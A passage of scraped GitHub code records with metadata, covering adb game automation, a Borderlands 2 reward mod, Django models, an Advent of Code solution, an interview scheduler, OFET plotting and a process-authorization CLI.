adb\nimport plugins.mission_ready as ready\nimport plugins.path as path\n\nIMAGE_BASE_EXP = 'imgs/wild/base_exp'\nIMAGE_BASE_WILDERNESS = 'imgs/wild/wilderness'\nIMAGE_BASE_FRIEND = 'imgs/wild/base_friend'\nIMAGE_BASE_MONEY = 'imgs/wild/base_money'\nIMGAE_BUILDING_CHECKER = 'imgs/wild/building_checker'\nIMAGE_BASE_CHECKER = 'imgs/wild/base_checker'\nIMAGE_CHAT_CHECKER = 'imgs/wild/chat_checker'\nIMGAE_CHAT = 'imgs/wild/chat'\n\ndef back_to_land():\n out=f.cut_find_html(IMGAE_BUILDING_CHECKER,1140,14,1307,81)\n if out[0]is not None:\n logger.debug('误入建筑,返回')\n adb.touch((60,60))\n time.sleep(1) \n\ndef wild_start():\n \"\"\"领不休荒原产物\"\"\"\n while not path.to_menu():\n pass\n adb.touch(f.find(IMAGE_BASE_WILDERNESS))\n logger.info('进入不休荒原')\n while(True):\n time.sleep(3)\n if (f.find(IMAGE_BASE_CHECKER)[2]>0.7):\n break\n adb.touch(f.find(IMAGE_BASE_EXP))\n time.sleep(2)\n back_to_land()#防止进入建筑页面\n adb.touch(f.find(IMAGE_BASE_MONEY))\n time.sleep(2)\n back_to_land()\n xy=f.cut_find_html(IMAGE_BASE_FRIEND,0,112,140,571)\n if xy[0] is not None:\n adb.touch(xy)\n #处理对话\n time.sleep(5)\n res=f.cut_find_html(IMGAE_CHAT,1462,165,1579,768)\n res2=f.cut_find_html(IMAGE_CHAT_CHECKER,1365,801,1585,890,False)\n if res[0] is not None or res2[0] is not None:\n for _ in range(15):\n if res[0] is not None:\n logger.debug('存在IMAGE_CHAT')\n adb.touch(res)\n if res2[0] is not None:\n logger.debug('存在IMAGE_CHAT_CHECKER')\n adb.touch(res2)\n time.sleep(2)\n res=f.cut_find_html(IMGAE_CHAT,1462,165,1579,768)\n res2=f.cut_find_html(IMAGE_CHAT_CHECKER,1365,801,1585,890,False)\n if res[0] is None and res2[0] is None:\n break\n else:\n return False\n return True", "repo_name": "YumisLink/1999-Auto", "sub_path": "plugins/wilderness.py", "file_name": "wilderness.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 50, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lib.find.cut_find_html", "line_number": 18, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 18, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 20, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 20, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 21, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 21, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "plugins.path.to_menu", "line_number": 26, "usage_type": "call"}, {"api_name": "plugins.path", "line_number": 26, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 28, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 28, "usage_type": "name"}, {"api_name": "lib.find.find", "line_number": 28, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 28, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 29, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.find.find", "line_number": 32, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 32, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 34, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 34, "usage_type": "name"}, {"api_name": "lib.find.find", "line_number": 34, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 34, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "lib.adb_command.touch", "line_number": 37, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 37, "usage_type": "name"}, {"api_name": "lib.find.find", "line_number": 37, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 37, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "lib.find.cut_find_html", "line_number": 40, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 40, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 42, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 42, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "lib.find.cut_find_html", "line_number": 45, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 45, "usage_type": "name"}, {"api_name": "lib.find.cut_find_html", "line_number": 46, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 46, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 50, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 50, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 51, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 51, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 53, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 53, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 54, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 54, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "lib.find.cut_find_html", "line_number": 56, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 56, "usage_type": "name"}, {"api_name": "lib.find.cut_find_html", "line_number": 57, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "24338605115", "text": "from typing import Callable, Any\nimport datetime\nimport dataclasses\n\nimport unrealsdk\n\nfrom ..rewards import Reward\n\n\ndef _claim(reward: Reward, pc: unrealsdk.UObject) -> None:\n mission_def = unrealsdk.FindObject(\"MissionDefinition\", \"GD_Episode01.M_Ep1_Champion\")\n backup_game_stage = mission_def.GameStage\n backup_title = mission_def.MissionName\n backup_credits = mission_def.Reward.CreditRewardMultiplier.BaseValueScaleConstant\n backup_reward_items = [r for r in mission_def.Reward.RewardItems]\n backup_reward_item_pools = [p for p in mission_def.Reward.RewardItemPools]\n\n mission_def.GameStage = reward.level\n pc.RCon(f\"set GD_Episode01.M_Ep1_Champion MissionName {reward.description}\")\n mission_def.Reward.RewardItems = []\n reward_pool = unrealsdk.FindObject(\"Object\", reward.lootpool)\n mission_def.Reward.RewardItemPools = [reward_pool, reward_pool]\n mission_def.Reward.CreditRewardMultiplier.BaseValueScaleConstant = 10\n\n def magic():\n pc.ServerGrantMissionRewards(mission_def, False)\n pc.ShowStatusMenu()\n\n def reset_mission_def() -> None:\n mission_def.GameStage = backup_game_stage\n pc.RCon(f\"set GD_Episode01.M_Ep1_Champion MissionName {backup_title}\")\n mission_def.Reward.RewardItems = backup_reward_items\n mission_def.Reward.RewardItemPools = backup_reward_item_pools\n mission_def.Reward.CreditRewardMultiplier.BaseValueScaleConstant = backup_credits\n\n call_in(5, reset_mission_def)\n\n call_in(0.01, magic)\n\n\ndef call_in(time: float, call: Callable[[], Any]) -> None:\n \"\"\"Call the given callable after the given time has passed.\"\"\"\n timer = datetime.datetime.now()\n future = timer + datetime.timedelta(seconds=time)\n\n # Create a wrapper to call the routine that is suitable to be passed to RunHook.\n def tick(caller: unrealsdk.UObject, function: unrealsdk.UFunction, params: unrealsdk.FStruct) -> bool:\n # Invoke the routine. If it returns False, unregister its tick hook.\n if datetime.datetime.now() >= future:\n call()\n unrealsdk.RemoveHook(\"WillowGame.WillowGameViewportClient.Tick\", \"RewardCallIn\" + str(call))\n return True\n\n # Hook the wrapper.\n unrealsdk.RegisterHook(\"WillowGame.WillowGameViewportClient.Tick\", \"RewardCallIn\" + str(call), tick)\n\n\nclass RewardMixin:\n reward: Reward\n claimed: bool\n\n def claim_reward(self, pc: unrealsdk.UObject) -> None:\n reward: Reward = self.reward\n reward_copy = dataclasses.replace(reward)\n _claim(reward_copy, pc)\n self.claimed = True\n\n @property\n def reward_desc(self) -> str:\n return self.reward.description\n", "repo_name": "juso40/bl2sdk_Mods", "sub_path": "BadassBounties/mixins/reward.py", "file_name": "reward.py", "file_ext": "py", "file_size_in_byte": 2704, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rewards.Reward", "line_number": 10, "usage_type": "name"}, {"api_name": "unrealsdk.UObject", "line_number": 10, "usage_type": "attribute"}, {"api_name": "unrealsdk.FindObject", "line_number": 11, "usage_type": "call"}, {"api_name": "unrealsdk.FindObject", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "unrealsdk.UObject", "line_number": 47, "usage_type": "attribute"}, {"api_name": "unrealsdk.UFunction", "line_number": 47, "usage_type": "attribute"}, {"api_name": "unrealsdk.FStruct", "line_number": 47, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "unrealsdk.RemoveHook", "line_number": 51, "usage_type": "call"}, {"api_name": "unrealsdk.RegisterHook", "line_number": 55, "usage_type": "call"}, {"api_name": "rewards.Reward", "line_number": 59, "usage_type": "name"}, {"api_name": "unrealsdk.UObject", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rewards.Reward", "line_number": 63, "usage_type": "name"}, {"api_name": "dataclasses.replace", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "31222750827", "text": "import sys\nsys.path.append(\"../\")\nfrom django.db import models\nfrom .product_type_model import ProductType\nfrom .customer_model import Customer\n\n\nclass Product(models.Model):\n \"\"\"\n Class to represent a product for sale on Bangazon\n tied to a\n particular User(customer) of bangazon API\n Extension of models.Model\n Variables:\n created: the current local date and time of creation\n name: the product's name\n \n customer: the foreign key of Customer class\n\n Author: Julia Kim-Chung\n \"\"\"\n created = models.DateTimeField(auto_now_add=True)\n name = models.CharField(max_length=100, blank=True, default=\"\")\n price = models.DecimalField(max_digits=20, decimal_places=2)\n description = models.TextField(max_length=300, default='')\n quantity = models.IntegerField()\n product_type =models.ForeignKey(ProductType, related_name=\"products\", on_delete=models.CASCADE, blank=True, null=True)\n customer =models.ForeignKey(Customer, related_name=\"products\", on_delete=models.CASCADE)\n\n def __str__(self):\n \"\"\"\n Method to create a string representing a Product sold/bought by a particular User(customer)\n \"\"\"\n\n return self.name\n\n class Meta:\n ordering =('name', )\n\n", "repo_name": "Ludicrous-Ducks/Bangazon_django", "sub_path": "bangazon/Bangazon_api/models/product_model.py", "file_name": "product_model.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "product_type_model.ProductType", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 28, "usage_type": "call"}, {"api_name": "customer_model.Customer", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 28, "usage_type": "attribute"}]} +{"seq_id": "13310872166", "text": "from django.core.exceptions import ValidationError\nfrom django.utils import timezone\n\n\ndef validate_date(date):\n if date > timezone.now().year:\n raise ValidationError(\n ('Заданный год: %(date)s больше текущего времени.'),\n params={'date': date},\n )\n", "repo_name": "gasimovv21/yamdb_final", "sub_path": "api_yamdb/reviews/validators.py", "file_name": "validators.py", "file_ext": "py", "file_size_in_byte": 320, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.utils.timezone.now", "line_number": 6, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 6, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "6778277104", "text": "import io\nfrom functools import reduce\n\nINPUT = \"input1.txt\"\n\n# ------------------------------------------------------\n# Load\n\n\ndef load():\n with io.open(INPUT, \"r\", encoding=\"utf-8\") as f:\n return [l.strip() for l in f]\n\n\n# ------------------------------------------------------\n# Functiony functions\n\n\ndef find_common(t):\n intersect = reduce(lambda x, y: x & y, t)\n assert len(intersect) == 1\n return intersect.pop()\n\n\ndef partition_in_3(l):\n n = len(l)\n assert n % 3 == 0\n return [(set(l[i]), set(l[i + 1]), set(l[i + 2])) for i in range(0, n, 3)]\n\n\ndef prioritize(c) -> int:\n if c.islower():\n return ord(c[0]) - ord(\"a\") + 1\n\n return ord(c[0]) - ord(\"A\") + 27\n\n\ndef to_sets(s: str) -> tuple:\n n = len(s)\n assert n % 2 == 0\n mid = n >> 1\n return (set(s[:mid]), set(s[mid:]))\n\n\n# ------------------------------------------------------\n# Main\n\n\ndef main():\n packs = load()\n\n solution1 = sum(map(prioritize, map(find_common, map(to_sets, packs))))\n print(f\"Solution 1:\\t{solution1}\")\n\n solution2 = sum(map(prioritize, map(find_common, partition_in_3(packs))))\n print(f\"Solution 2:\\t{solution2}\")\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "JeffreyMFarley/adventofcode", "sub_path": "2022/day03/solve1.py", "file_name": "solve1.py", "file_ext": "py", "file_size_in_byte": 1204, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "io.open", "line_number": 11, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "7145254908", "text": "import os\nimport random\nimport pandas as pd\nfrom datetime import datetime\nfrom collections import defaultdict\nfrom openpyxl.styles import PatternFill\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nfrom openpyxl import Workbook\n\n\ndef _read_interviewee_sheet():\n \"\"\"\n Check the bellow JS function to get the schedule from when2meet.\n (https://www.when2meet.com/?18687020-njdRB)\n function getCSV() {\n result = \"Time,\" + PeopleNames.join(\",\")+\"\\n\";\n for(let i = 0; i < AvailableAtSlot.length; i++) {\n let slot = $x(`string(//div[@id=\"GroupTime${TimeOfSlot[i]}\"]/@onmouseover)`);\n slot = slot.match(/.*\"(.*)\".*/)[1];\n result += slot + \",\";\n result += PeopleIDs.map(id => AvailableAtSlot[i].includes(id) ? 1 : 0).join(\",\");\n result+= \"\\n\";\n }\n console.log(result);\n }\n getCSV();\n :return:\n \"\"\"\n sheet = defaultdict(list)\n interviewee = \"/\".join([os.getcwd(), \"input\", \"interviewee.txt\"])\n with open(interviewee, \"r\") as f:\n date = 25\n for interviewee_row in f.readlines():\n if \"#\" in interviewee_row:\n date += 1\n else:\n # formatting\n avaliables = interviewee_row.split(' - ')\n avaliables[1] = avaliables[1].replace(\"\\'\", \"\")\n avaliables[1] = avaliables[1].replace(\", \", \",\")\n avaliables[1] = avaliables[1][1:-2]\n avaliables[1] = avaliables[1].split(\",\")\n avaliables[0] = \":\".join([str(date), avaliables[0].split(\" ~ \")[0]])\n sheet[avaliables[0]].extend(avaliables[1])\n return sheet\n\n\ndef _read_interviewer_sheet():\n sheet = defaultdict(list)\n interviewer = \"/\".join([os.getcwd(), \"input\", \"interviewer.csv\"])\n df = pd.read_csv(interviewer)\n for row_id, row in df.iterrows():\n time_slot = datetime.strptime(row[0], '%a %d %b %Y %I:%M:%S %p %Z')\n time_slot = time_slot.strftime('%d:%H:%M')\n for co_id, interviewer in enumerate(row):\n if interviewer == 1:\n sheet[time_slot].append(df.columns[co_id])\n return sheet\n\n\ndef generate_interview_schedule():\n interviewers = _read_interviewee_sheet()\n interviewees = _read_interviewer_sheet()\n\n candidates = dict()\n assignments = list()\n all_times = list(set(interviewers.keys()) & set(interviewees.keys()))\n\n for t in all_times:\n candidates[t] = {\n 'interviewer': interviewers[t],\n 'interviewee': interviewees[t]\n }\n for t in all_times:\n candidates_t = candidates[t]\n if len(candidates_t['interviewer']) > 0 and len(candidates_t['interviewee']) > 0:\n interviewee = random.choice(candidates_t['interviewee'])\n interviewers_t = candidates_t['interviewer']\n interviewer = random.choice(interviewers_t)\n interviewers_t.remove(interviewer)\n assignments.append({\n \"date:time\": t,\n \"interviewer\": interviewer,\n \"interviewee\": interviewee,\n \"candidates\": \", \".join(interviewers_t)\n })\n candidates_t['interviewee'].remove(interviewee)\n\n return assignments\n\n\ndef make_schedule_sheet(sheet):\n df = pd.DataFrame(sheet)\n df = df.sort_values(by=[\"date:time\"], ascending=[True])\n wb = Workbook()\n ws = wb.active\n for r in dataframe_to_rows(df, index=False, header=True):\n ws.append(r)\n green_fill = PatternFill(start_color='00FF00', end_color='00FF00', fill_type='solid')\n pink_fill = PatternFill(start_color='F781F3', end_color='F781F3', fill_type='solid')\n for row in ws.iter_rows(min_row=2, max_col=len(df.columns) + 1):\n for cell in row:\n # coloring test\n if '25' in str(cell.value):\n cell.fill = pink_fill\n elif '26' in str(cell.value):\n cell.fill = green_fill\n wb.save(\"output/schedule.xlsx\")\n\n\nif __name__ == \"__main__\":\n schedule_candidate = generate_interview_schedule()\n make_schedule_sheet(schedule_candidate)\n\n\n", "repo_name": "chaeheekang/test_make_interview_schedule", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 30, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 49, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "call"}, {"api_name": "openpyxl.Workbook", "line_number": 95, "usage_type": "call"}, {"api_name": "openpyxl.utils.dataframe.dataframe_to_rows", "line_number": 97, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 99, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "32882246857", "text": "import matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nfrom glob import glob\n\nmaindir = '/Users/taylorvenenciano/Desktop/OFET_IV'\nsubdir = '4_14_OFETs'\nsubsubdir = 'Run 1' # will graph all files ending in .txt in this folder name, labeled as 1_10V.txt\nall_dir = glob(os.path.join(maindir, subdir, subsubdir, \"*.txt\")) #adjust to determine directory\nsort = sorted(all_dir) # ordering data so that legend is nice\n\nfor item in sort:\n frame = pd.read_table(item)\n volt = frame['Voltage (V)']\n curr = frame['Current (A)']\n curr_micro = pd.to_numeric(curr)*(10**6) # changing unit to microA\n name = os.path.split(item)[1] #using name of file for legend\n name2 = name.split('_')[1] #modify here for naming convention\n name3 = name2.split('.')[0]#modify here for naming convention\n plt.plot(volt, -curr_micro, label = name3) #if current is positive, put negative curr_micro, change label for legend\n \nplt.xlabel('Voltage (V)')\nplt.ylabel('Current (\\N{MICRO SIGN}A)')\nplt.title('IV Curves ' + subdir) #adjust title of graph\nplt.xlim([40,0]) #adjust x-range\nplt.ylim([-60,0]) #adjust y-range\nplt.legend()\nplt.show()", "repo_name": "tvenen/hudgings_lab_OFET", "sub_path": "ivgraph_ofets.py", "file_name": "ivgraph_ofets.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pandas.read_table", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "9989367702", "text": "import argparse\nimport json\nimport os\nimport pwd\n\nfrom tools import readFromFile, writeInJsonFile\nfrom process_manage_user import mainProcessAuthorizationExe, addUserInJson\nfrom manage_process import responseForAction\n\nfrom env import ALLOW_EXE, DENY_EXE, ALWAYS_ASK_EXE, PROCESS_EXE, PATH_TO_PROCESS_EXE, FILE_ALL_PROCESS_PID_WAITING\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-a\", \"--action\", type=str, help=\"Action pour gérer un processus.\", required=True)\nparser.add_argument(\"-d\", \"--path_folder\", type=str, help=\"Chemin du dossier pour appliquer une action.\")\nparser.add_argument(\"-f\", \"--path_file\", type=str, help=\"Chemin du fichier pour appliquer une action.\")\nparser.add_argument(\"-p\", \"--pid\", type=int, help=\"Pid du processus pour appliquer une action.\")\n\nparser.add_argument(\"-u\", \"--user\", type=str, help=\"Action pour un utilisateur spécifiques. Si l'utilisateur n'existe pas dans le fichier JSON, celui-ci se créera.\")\nparser.add_argument(\"-s\", \"--suppress\", type=str, help=\"Supprime une action dans la liste des actions.\")\nparser.add_argument(\"-l\", \"--list_action\", help=\"Liste les actions fait sur certains processus au format json.\", action='store_true')\nparser.add_argument(\"-w\", \"--waiting_process\", help=\"Liste les processus en attente d'actions.\", action='store_true')\n\nargs = parser.parse_args()\n\nUSER = \"all\"\n\ndef getAction(action):\n '''\n Permet de trouver les bonnes énumérations afin d'appliquer une action sur un processus \n '''\n if action == \"acc\":\n return ALLOW_EXE\n elif action == \"den\":\n return DENY_EXE\n elif action == \"ask\":\n return ALWAYS_ASK_EXE\n else:\n return None\n\nif __name__ == \"__main__\":\n '''\n MAIN CLI\n '''\n if args.action == None:\n parser.print_help()\n exit(-1)\n elif args.action != \"acc\" and args.action != \"den\":\n print(\"Les actions pour gérer les processus :\\n\\t- {}\\n\\t- {}\\n\".format(\"acc\", \"den\"))\n parser.print_help()\n exit(-1)\n\n if args.user != None and args.user != \"all\":\n try:\n pwd.getpwnam(args.user)\n addUserInJson(args.user)\n USER = args.user\n except KeyError:\n print(\"L'utilisateur {} n'existe pas.\".format(args.user))\n\n if args.path_folder != None:\n if os.path.isdir(args.path_folder):\n main_process_authorization = mainProcessAuthorizationExe(args.path_folder, USER, authorization_exe_decision=args.action)\n print(\"main_process_authorization --> {}\".format(main_process_authorization))\n else:\n print(\"[Erreur] Le dossier {} n'existe pas.\".format(args.path_folder))\n elif args.path_file != None:\n if os.path.isfile(args.path_file):\n main_process_authorization = mainProcessAuthorizationExe(args.path_file, USER, authorization_exe_decision=args.action)\n print(\"main_process_authorization --> {}\".format(main_process_authorization))\n else:\n print(\"[Erreur] Le fichier {} n'existe pas.\".format(args.path_file))\n elif args.pid != None:\n pid = args.pid\n responseForAction(args.pid, USER, args.action)\n elif args.list_action != None and args.list_action:\n print(\"args.list_action --> {}\".format(args.list_action))\n read_authorization_exe = readFromFile()\n action = getAction(args.action)\n if action != None:\n print(json.dumps(read_authorization_exe[USER][action], sort_keys=True, indent=4))\n else:\n print(\"Aucune action {} n'a été mise en place.\".format(action))\n elif args.waiting_process != None and args.waiting_process:\n read_wainting_process = readFromFile(json_file=FILE_ALL_PROCESS_PID_WAITING)\n print(json.dumps(read_wainting_process, sort_keys=True, indent=4))\n elif args.suppress != None:\n print(\"args.list_action --> {}\".format(args.list_action))\n read_authorization_exe = readFromFile()\n action = getAction(args.action)\n if action != None:\n try:\n action_path = None\n if os.path.isdir(args.suppress):\n action_path = PATH_TO_PROCESS_EXE\n elif os.path.isfile(args.suppress):\n action_path = PROCESS_EXE\n else:\n print(\"Le chemin ou dossier n'existe pas.\")\n exit(1)\n \n read_authorization_exe[USER][action][action_path].remove(args.suppress)\n writeInJsonFile(read_authorization_exe)\n print(\"test ----> {}\\n\".format(read_authorization_exe))\n\n except KeyError as ke:\n print(\"[KeyError] {}\".format(ke))\n except ValueError:\n print(\"Le chemin {} n'existe pas dans l'action {} chez l'utilisateur {}.\".format(args.suppress, args.action, USER))\n else:\n print(\"Aucune action {} n'a été mise en place.\".format(action))\n else:\n parser.print_help()\n exit(-1)", "repo_name": "Gershpenst/manage-process-python", "sub_path": "cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 5008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "env.ALLOW_EXE", "line_number": 32, "usage_type": "name"}, {"api_name": "env.DENY_EXE", "line_number": 34, "usage_type": "name"}, {"api_name": "env.ALWAYS_ASK_EXE", "line_number": 36, "usage_type": "name"}, {"api_name": "pwd.getpwnam", "line_number": 54, "usage_type": "call"}, {"api_name": "process_manage_user.addUserInJson", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "process_manage_user.mainProcessAuthorizationExe", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "process_manage_user.mainProcessAuthorizationExe", "line_number": 68, "usage_type": "call"}, {"api_name": "manage_process.responseForAction", "line_number": 74, "usage_type": "call"}, {"api_name": "tools.readFromFile", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "tools.readFromFile", "line_number": 84, "usage_type": "call"}, {"api_name": "env.FILE_ALL_PROCESS_PID_WAITING", "line_number": 84, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 85, "usage_type": "call"}, {"api_name": "tools.readFromFile", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "env.PATH_TO_PROCESS_EXE", "line_number": 94, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "env.PROCESS_EXE", "line_number": 96, "usage_type": "name"}, {"api_name": "tools.writeInJsonFile", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "11319666847", "text": "import os, sys\nimport requests\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n\ndef send_report_link():\n CI_JOB_ID = sys.argv[1]\n EXIT_CODE = int(sys.argv[2])\n status = 'SUCCESS'\n if EXIT_CODE != 0:\n status = 'FAILED'\n\n repo_name = 'messenger_tests_web'\n\n job = f'https://gitlab.com/messenger_team/{repo_name}/-/jobs/{CI_JOB_ID}'\n report = 